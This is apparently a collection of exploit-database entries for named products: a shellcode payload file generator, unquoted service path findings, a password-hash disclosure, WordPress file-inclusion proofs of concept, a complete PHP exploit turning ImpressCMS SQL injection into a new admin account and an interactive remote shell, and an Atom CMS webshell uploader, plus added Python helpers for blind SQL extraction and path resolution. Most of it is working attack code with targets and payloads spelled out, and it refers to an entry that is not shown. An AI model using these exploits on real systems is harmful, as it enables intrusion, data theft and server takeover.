buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00"
buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"

padding = "C" * (len(buffer) - len(push_esp) - len(nops))
payload = buffer + push_esp + nops + buf + padding

try:
    with open("0day_Hejap.txt", "wb") as f:
        print("[+] Creating %s Shellcode 0day-Hejap payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except IOError:
    print("[-] File cannot be created")

BattlEye 0.9 - 'BEService' Unquoted Service Path

# Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path
# Date: 09/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.battleye.com/
# Software Link: https://www.battleye.com/downloads/
# Version: 0.94
# Tested: Windows 10 Pro
# Contact: https://twitter.com/dmaral3noz

C:\Users\saudh>sc qc BEService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BEService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BattlEye Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt requires the local user to be able to place an executable at one of the paths Windows tries before the real binary, here C:\Program.exe, C:\Program Files.exe or C:\Program Files (x86)\Common.exe, without being stopped by the OS or other security software. The planted file then runs as LocalSystem. Because the service is DEMAND_START it is executed only when the service is next started (for example when a protected game launches it), not automatically at boot, and on a default installation standard users cannot write to C:\ or C:\Program Files (x86), so exploitability depends on those ACLs having been loosened.
# Exploit Title: Sony PlayMemories Home - 'PMBDeviceInfoProvider' Unquoted Service Path
# Date: 09/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sony.com/
# Software Link: https://support.d-imaging.sony.co.jp/www/disoft/int/download/playmemories-home/win/en/index.html
# Version: 6.0
# Tested: Windows 10 Pro
# Contact: https://twitter.com/dmaral3noz

C:\Users\saudh>sc qc PMBDeviceInfoProvider
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: PMBDeviceInfoProvider
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : PMBDeviceInfoProvider
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt requires the local user to be able to place an executable at one of the paths Windows tries before the real binary, here C:\Program.exe, C:\Program Files.exe or C:\Program Files (x86)\Sony\PlayMemories.exe, without being stopped by the OS or other security software. Because the service is AUTO_START and runs as LocalSystem, the planted file is executed with SYSTEM privileges at the next reboot. On a default installation standard users cannot create files in C:\ or under C:\Program Files (x86), so check the ACLs of those directories before reporting this as exploitable.

# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
# Exploit Author: LiquidWorm

Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
                      Lib: 04.00.217
                      Int: 2.3.235.J013
                      OS: 2.0.20
                  WX: Ver: 4.00 284 H062
                      App: 02.08.766
                      Lib: 04.00.169
                      Int: 02.2.208

Summary: Protege GX is an enterprise level integrated access control, intrusion detection and building automation solution with a feature set that is easy to operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, web-based, cross-platform system that gives you a fully functional access control and intrusion detection solution in a fraction of the time of conventional software. With no software to install, setup is quick and simple. Connect the Controller and system components, then open a web browser to launch the intuitive wizard-driven interface which guides you through the process of configuring your system.

Desc: The application is vulnerable to improper access control that allows an authenticated operator to disclose the SHA1 password hashes of other users/operators. The operator edit page embeds the selected operator's hash in a hidden pswdsha input, so any operator who can open the page can read it from the page source and attempt offline cracking.

Tested on: Microsoft-WinCE/6.00

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5700
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php

08.02.2022

--

Navigate to http://CONTROLLER_IP/operator.htm

Source:

<p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly="">
<input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p>
...
...
<input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">
...

# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/
# Date: 23-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/
# Version: 3.7.3
# Tested on: Firefox
# Vulnerable File: dispatcher.php

# Vulnerable Code:

```
if ( isset($_GET['open']) ) {
    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
    echo '
    <div id="welcome-panel" class="welcome-panel" style="padding-bottom: 20px;">
        <div class="welcome-panel-column-container">';
    include_once( ABSPATH . WPINC . '/feed.php' );
```

# Proof of Concept:

localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]

The open parameter is appended to the plugins directory with no traversal or extension check, so ../ sequences reach any file readable by the web server. Because the path goes to include() rather than readfile(), a file that contains PHP code (an uploaded image with embedded PHP, a poisoned log) is executed, which makes this local file inclusion and not merely a read. No login is required to reach dispatcher.php.


ImpressCMS 1.4.2 - Remote Code Execution (RCE)

# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE)
# Exploit Author: Egidio Romano aka EgiX
# Date: 30/03/2022
# Version: <= 1.4.2
# Vendor: https://www.impresscms.org
# CVE: CVE-2021-26599

<?php

/*
    ----------------------------------------------------------
    ImpressCMS <= 1.4.2 SQL Injection to Remote Code Execution
    ----------------------------------------------------------

    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://www.impresscms.org

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    User input passed through the "groups" POST parameter to the /include/findusers.php script is not
    properly sanitized before being passed to the icms_member_Handler::getUserCountByGroupLink() and
    icms_member_Handler::getUsersByGroupLink() methods. These methods use the first argument to construct
    a SQL query without proper validation, and this can be exploited by remote attackers to e.g. read
    sensitive data from the "users" database table through boolean-based SQL Injection attacks. The
    application uses PDO as a database driver, which allows for stacked SQL queries, as such this
    vulnerability could be exploited to e.g. create a new admin user and execute arbitrary PHP code.

    [-] CVE Reference:

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2021-26599 to this vulnerability.

    [-] Disclosure timeline:

    [19/01/2021] - Vendor notified through HackerOne
    [29/01/2021] - Vulnerability acknowledged by the vendor
    [03/02/2021] - CVE number assigned
    [06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed
    [11/02/2022] - Vendor was informed about the ineffective fix
    [09/03/2022] - Version 1.4.4 released
    [22/03/2022] - Public disclosure

    [-] Technical writeup:

    http://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce
*/

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

// Hex-encode a string as a MySQL 0x... literal so no quotes are needed in the injected SQL
function hex_enc($input)
{
    $encoded = "";
    for ($i = 0; $i < strlen($input); $i++) $encoded .= sprintf("%02x", ord($input[$i]));
    return "0x{$encoded}";
}

print "+-----------------------------------------------------------+\n";
print "| ImpressCMS <= 1.4.2 Remote Code Execution Exploit by EgiX |\n";
print "+-----------------------------------------------------------+\n";

if ($argc != 2)
{
    print "\nUsage: php $argv[0] <URL>";
    print "\nExample.: php $argv[0] http://localhost/impresscms/";
    print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n";
    die();
}

$url = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

print "\n[+] Retrieving security token (CVE-2021-26598)\n";

curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend");
$res = curl_exec($ch);

if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session cookie not found!\n");
if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n");

print "[+] Starting SQL Injection attack (CVE-2021-26599)\n";
print "[*] Step 1: retrieving database name\n";

curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php");
curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]);

$params = "user_submit=1&token={$token[1]}&groups[]=%s";
$min = true;
$idx = 1;

// Boolean-based blind extraction: 8 queries per character, binary search on ORD()
while(1)
{
    $test = 256;

    for ($i = 7; $i >= 0; $i--)
    {
        $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));
        $sql = "1) AND ORD(SUBSTR(DATABASE(),{$idx},1))<{$test}#";
        curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
        $min = !preg_match("/No Users Found/", curl_exec($ch));
    }

    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;

    $dbname .= chr($chr);
    $min = true;
    $idx++;
    print "\r[+] DB name: {$dbname}";
}

print "\n[*] Step 2: retrieving tables prefix\n";

$sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'";
$min = true;
$idx = 1;

// Time-based blind extraction through a stacked prepared statement (PDO allows it)
while(1)
{
    $test = 256;

    for ($i = 7; $i >= 0; $i--)
    {
        $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));
        $sql = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))");
        $sql = "0); SET @q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#";
        curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
        $start = time();
        curl_exec($ch);
        $secs = time() - $start;
        $min = ($secs < 2);
    }

    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;

    $prefix .= chr($chr);
    $min = true;
    $idx++;
    print "\r[+] Prefix: {$prefix}";
}

print "\n[*] Step 3: creating new admin user\n";

$uid = time();
$enc = hex_enc("egix");
$pwd = hex_enc(md5("egix"));

$sql = "0); INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, {$enc}, {$enc}, {$pwd}, 5, 0)#";
curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
curl_exec($ch);

$sql = "0); INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})#";
curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
curl_exec($ch);

print "[+] Trying to login as the new user\n";

curl_setopt($ch, CURLOPT_URL, "{$url}user.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login");

if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n");

print "[+] Creating malicious autotask\n";

$phpcode = urlencode("if (isset(\$_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD])); die; }");

curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php");
curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]);
curl_setopt($ch, CURLOPT_POSTFIELDS,  "fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks");

if (!preg_match("/HTTP.*302/i", curl_exec($ch))) die("[-] Something went wrong!\n");

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, false);

while(1)
{
    print "\nimpresscms-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
    preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
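Steps 1 and 2 of EgiX's script share one loop: a per-character binary search over ORD(SUBSTR(secret, idx, 1)) that costs exactly eight oracle queries per character and stops when SUBSTR runs past the end of the string (MySQL's ORD('') is 0). The block below is an added example, not part of the exploit above: it lifts that loop into a Python function and replaces the injection with an oracle callback, so the convergence can be checked offline against a constructed secret. Against a real target the oracle would send the findusers.php request and return whether "No Users Found" was absent (boolean variant) or whether the response took at least two seconds (time-based variant).

```python
"""Added example (not from the ImpressCMS exploit): the 8-query-per-byte blind
extraction used above, with the SQL oracle abstracted into a callback."""

def extract_string(oracle, max_len=64):
    """oracle(idx, test) -> True iff ORD(SUBSTR(secret, idx, 1)) < test,
    idx being 1-based as in SQL. Mirrors the PHP loop: start at 256, then for
    each bit subtract 2**i if the last answer was "less", else add 2**i; after
    eight answers the byte is test-1 (last answer "less") or test."""
    out = bytearray()
    for idx in range(1, max_len + 1):
        test = 256
        less = True
        for i in range(7, -1, -1):
            test = test - 2 ** i if less else test + 2 ** i
            less = oracle(idx, test)
        byte = test - 1 if less else test
        if byte == 0:           # SUBSTR past the end: ORD('') = 0, stop
            break
        out.append(byte)
    return out.decode("latin-1")  # single-byte ORD values only, as in the PHP

def make_oracle(secret, log=None):
    """Simulated injection point behaving like MySQL evaluating
    ORD(SUBSTR(secret, idx, 1)) < test. `log` collects every (idx, test)
    pair so the query cost can be inspected."""
    data = secret.encode("latin-1")
    def oracle(idx, test):
        if log is not None:
            log.append((idx, test))
        ord_value = data[idx - 1] if idx - 1 < len(data) else 0
        return ord_value < test
    return oracle

if __name__ == "__main__":
    queries = []
    secret = "icms_"  # constructed table prefix for the demo
    print(extract_string(make_oracle(secret, queries)))
    print("%d queries for %d characters plus the terminator" % (len(queries), len(secret)))
```

Two properties worth noticing when adapting this: the search never asks "equal", so the final byte falls out of the last comparison, and the terminating ORD('') = 0 check means a secret that legitimately contains a NUL byte would be cut short. The time-based variant in Step 2 is the same loop with a slower oracle; the extraction cost is still 8 queries per byte, which is why a 1-second SLEEP and a 2-second threshold are enough.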

Atom CMS 2.0 - Remote Code Execution (RCE)

# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)
# Date: 22.03.2022
# Exploit Author: Ashish Koli (Shikari)
# Vendor Homepage: https://thedigitalcraft.com/
# Software Link: https://github.com/thedigicraft/Atom.CMS
# Version: 2.0
# Tested on: Ubuntu 20.04.3 LTS
# CVE: CVE-2022-25487

# Description
This script uploads a PHP webshell to Atom CMS. The application stores the file in the uploads directory under a numeric name, which the script reads back from the upload response so the webshell can be reached directly.

# Usage : python3 exploit.py <IP> <Port> <atomcmspath>
# Example: python3 exploit.py 127.0.0.1 80 /atom

# POC Exploit: https://youtu.be/qQrq-eEpswc

# Note: A crafted shell.txt file is required for exploitation and is available at the link below. It is sent as the raw request body, so it must contain the complete multipart/form-data body (boundary ----WebKitFormBoundaryH7Ak5WhirAIQ8o1L, matching the Content-Type header) with the PHP webshell as the file part. The script opens the name in lowercase, shell.txt.
# https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC

'''
Description: A file upload functionality in Atom CMS 2.0 allows any non-privileged user to gain access to the host through the uploaded files, which may result in remote code execution.
'''

#!/usr/bin/python3

'''
Import required modules:
'''
import sys
import requests
import json
import re

'''
User Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
atomcmspath = sys.argv[3]

'''
Get cookie
'''
session = requests.Session()
link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin'
response = session.get(link)
cookies_session = session.cookies.get_dict()
# Flatten the cookie dict into a "name=value" Cookie header value
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}', '')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')

'''
Upload Webshell:
'''
# Construct Header:
header1 = {
    'Host': target_ip,
    'Accept': 'application/json',
    'Cache-Control': 'no-cache',
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',
    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',
    'Origin': 'http://' + target_ip,
    'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Cookie': cookie,
    'Connection': 'close',
}

# loading Webshell payload (pre-built multipart body, see note above):
path = 'shell.txt'
with open(path, 'rb') as fp:
    data = fp.read()

# Uploading Webshell:
link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1'
upload = requests.post(link_upload, headers=header1, data=data)

# The response carries the numeric name the CMS gave the file; keep only the digits
p = upload.text
x = re.sub(r"\s", "\n", p)
y = x.replace("1<br>Unknown", "null")
z = re.sub('[^0-9]', '', y)

'''
Finish:
'''
print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php')
print('')

WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion

# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/
# Version: 1.0.3
# Tested on: Firefox
# Vulnerable File: tblight.php
# Impact: Local File Read / Code Execution

# Vulnerable Code:

```
if(!empty($_GET['controller']) && !empty($_GET['action']) && !empty($_GET['ajax']) && $_GET['ajax'] == 1) {
    require_once('' . 'controllers/'.$_GET['controller'].'.php');
}
```

# Proof of concept:

http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1

# POC Code Execution:

/etc/index.php:

<?php
echo "Local file read";
phpinfo();
?>

Note: The controller value has '.php' appended and, on any PHP that rejects NUL bytes in paths, that suffix cannot be truncated, so only files whose name ends in .php can be included. The proof of concept therefore plants /etc/index.php first; in a real attack the included .php would have to be something the attacker already controls on disk (an uploaded file, a writable log, or a PHP session file). Because the path goes to require_once(), the included file is executed, not just read.
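The three WordPress entries on this page (admin-word-count-column, amministrazione-aperta and cab-fare-calculator) are the same bug with three different prefix/suffix combinations, and whether a given payload works depends on exactly how PHP turns `prefix . $_GET[...] . suffix` into a path. The block below is an added example, not code from any of the plugins or advisories: it models that concatenation with posixpath (no disk access, so it runs anywhere), reproduces the NUL-byte truncation that old PHP applied (the admin-word-count-column advisory lists 5.3.2 and below), and shows the containment check that would have stopped each of the three proofs of concept. The plugin directory and the assumption that PHP's working directory is the script's own directory are constructed for the demo.

```python
"""Added example (not from the plugins or advisories): resolve the three PoC
inputs above the way PHP would, and apply the check that rejects them."""
import posixpath

PLUGIN_DIR = "/var/www/html/wp-content/plugins"  # assumed ABSPATH . 'wp-content/plugins'

def php_path(prefix, user_input, suffix, null_byte_truncation=False):
    """Path PHP would open for `prefix . $_GET[...] . suffix`. With
    null_byte_truncation=True the path ends at the first NUL, as PHP did
    before it started rejecting NUL bytes in file names."""
    raw = prefix + user_input + suffix
    if null_byte_truncation and "\x00" in raw:
        raw = raw.split("\x00", 1)[0]
    return posixpath.normpath(raw)

def is_confined(path, allowed_dir):
    """True iff the normalised path lies strictly inside allowed_dir."""
    allowed = posixpath.normpath(allowed_dir) + "/"
    return posixpath.normpath(path).startswith(allowed)

def safe_include(prefix, user_input, suffix, allowed_dir):
    """Hardened form: refuse NUL bytes outright (they defeat the suffix on old
    PHP) and refuse anything that resolves outside allowed_dir."""
    if "\x00" in user_input:
        return None
    path = php_path(prefix, user_input, suffix)
    return path if is_confined(path, allowed_dir) else None

# The three proofs of concept as (prefix, user input, suffix), matching the
# vulnerable lines quoted in each advisory.
CASES = {
    "admin-word-count-column": (
        PLUGIN_DIR + "/admin-word-count-column/",   # cwd of download-csv.php (assumed)
        "../../../../../../../../../../../../etc/passwd\x00", "cpwc.csv"),
    "amministrazione-aperta": (
        PLUGIN_DIR + "/", "../../../../../../../../etc/passwd", ""),
    "cab-fare-calculator": (
        PLUGIN_DIR + "/cab-fare-calculator/controllers/",
        "../../../../../../../../../../../etc/index", ".php"),
}

def resolve_all(null_byte_truncation=False):
    """Resolved path for every PoC under the given PHP behaviour."""
    return {name: php_path(p, i, s, null_byte_truncation)
            for name, (p, i, s) in CASES.items()}

if __name__ == "__main__":
    for php_old in (True, False):
        print("old PHP (NUL truncates):" if php_old else "current PHP:")
        for name, path in resolve_all(php_old).items():
            print("  %-24s -> %r  confined=%s" % (name, path, is_confined(path, PLUGIN_DIR)))
```

Run it and the admin-word-count-column payload resolves to /etc/passwd only under the old behaviour; on current PHP the suffix survives and the request fails, while the other two resolve to /etc/passwd and /etc/index.php regardless of version. A basename allow-list (accept only known controller names) is simpler and stricter than the containment check shown, but the check is the minimum that makes all three inputs fail.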